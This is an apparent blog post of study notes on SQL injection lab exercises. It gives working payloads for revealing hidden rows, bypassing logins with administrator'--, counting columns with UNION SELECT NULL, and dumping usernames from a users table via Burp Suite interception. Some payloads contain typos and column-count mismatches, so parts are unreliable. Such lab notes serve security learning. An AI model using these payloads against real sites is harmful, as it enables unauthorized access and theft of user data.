Skip to main content

Command Palette

Search for a command to run...

SQLI Labs

Updated
2 min readView as Markdown
P
CTF player and Web Pentester

1) Clause allowing retriving hidden data

click on any option on weebpage and intercept it in burpsuite and change the paramater value to 'OR 1=1-- and see hidden data


2) SQLI allowing login bypass

open login page put fake credentials and intercept it & inplace of password type this administrator'-- or administrator'--'


3) UNION ATTACKS

SELECT a, b FROM table1 UNION SELECT c, d FROM table2

Determining Number of Columns

'UNION SELECT NULL--
'UNION SELECT NULL, NULL--
'UNION SELECT NULL, NULL, NULL--

# put NULL untill wee get anyh response

open web page select click on any option intercept it and add above value instaed of it and increasse NULL untill we get any response


4) Finding Columns with Usefull Datatypes

After finding number of columns we can get the data type

if we found 3 columns
'UNION SELECT 'a',NULl, NULL,NULL--
'UNION SELECT NULL ,'a',NULL,NULL--
'UNION SELECT NULL, NULL,'a',NULL--
"UNION SELECT NULL, NULL, NULL,'a'--

5) Finding a Column Containing text

open webpage click on any option and intercept it and inplace of it put this

'UNION SELECT NULL, 'a', NULL--

now replace the value of a with a string value if we got in webpage 

6) Retrive Data From Other Tables

open web page and click on any value and change it to 'UNION SELECT NULL, NULL-- increase this NULL until we cannot see the Tables

When we get see DATATABLES 'UNION SELECT 'test', NULL--

after that 'UNION SELECT 'test', 'test2'--

after that 'UNION SEECT username FROM users--

and we can see the data dumped from table user